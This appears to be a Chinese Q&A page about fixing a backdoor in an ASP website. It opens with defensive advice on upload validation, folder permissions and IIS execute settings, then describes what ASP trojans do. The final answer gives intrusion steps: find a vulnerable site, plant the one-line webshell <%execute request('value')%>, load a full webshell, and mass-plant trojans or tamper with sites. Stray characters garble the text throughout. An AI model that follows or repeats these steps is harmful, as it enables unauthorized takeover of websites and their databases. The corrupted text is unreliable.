ASP查出有后门如何修改

通常的asp木马后蚂蚂门是由于程序本身对于上传的限制不够严格引起的。

建议：

1、上传的地方除了判断文件的扩展名，还要判断文件的ContentType来严格限制

2、网站目录的权限设置，最好能够限制网站目录的写入权限，只有需要写入权限的文件夹（通常是数塌隐据库团物厅目录和上传文件夹）才赋予写入权限，其他的文件夹都取消写入权限。

3、iis安全设置，对于上传的文件夹，设置IIS的执行权限为无，即使上传了木马，也无法执行脚本。

它是用ASP编写的网站程序。它和其它ASP程序没有本质区别，只要是能运行ASP的空间就能运行它，这种性卜备质使得ASP木马非常不易被发觉。就算是优秀的杀毒软件，也未必能够检测出它到底是ASP木马还是正常的ASP网站程序。 它主要用来远程岩弊隐入侵ASP网站,篡改网页,入侵数据库,进行修改删除数据等恶意 *** 作,有时候还能造成该网站所在的电脑中毒,运行缓慢,死机,数据丢粗厅失等副作用

记得采纳啊

首先需要找到有漏洞的网站

然后写入小马，比如：<%execute request('value')%>

就可以导入大马了

导入大马以后，知道大马的路劲，在浏览器就可并顷以打开了，输入密码即可使用了

你可以，批量挂马，修改网站，下碧友载网站等 *** 作绝慧陆

---